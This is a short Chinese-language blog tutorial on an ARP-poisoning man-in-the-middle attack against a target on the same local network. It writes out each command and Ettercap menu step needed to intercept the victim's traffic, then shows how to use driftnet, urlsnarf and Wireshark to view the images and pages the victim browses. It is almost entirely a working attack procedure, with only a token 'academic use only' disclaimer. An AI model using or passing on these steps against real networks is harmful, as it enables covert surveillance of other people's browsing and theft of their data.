Loading... #0x01前提 攻击者与目标要位于同一路由网络下 使用工具:kali linux(ettercap+wireshark+dsniff) #(本教程仅用于学术交流) #0x02过程 终端输入```echo 1 > /proc/sys/net/ipv4/ip_forward```开启转发保证目标能正常上网 ##一。开启嗅探 终端输入```ettercap -G```打开```ettercap```界面,选择```Sniff``` –> ```Unified sniffing``` –> 选择你对应的网卡 –> ```Hosts``` –> ```Scan for hosts``` –> ```Hosts list``` –> 将目标ip添加到```Target 1```,将路由器ip添加到```Target 2``` –> ```Mitm``` –> ```APR poisoning``` –> ```Sniff remote connections``` –> ```Start``` –> ```Start sniffing``` ##二。监听数据 终端输入```driftnet -i eth0```(我嗅探使用的网卡是eth0,具体情况具体填写),弹出一个窗口会显示目标正在浏览的图片。 终端输入```urlsnarf -i eth0``` 监听目标浏览过的网页日志。 打开wireshark进行抓包。 Last modification:October 23, 2019 © Allow specification reprint Support Appreciate the author AliPayWeChat Like 0 如果觉得我的文章对你有用,请随意赞赏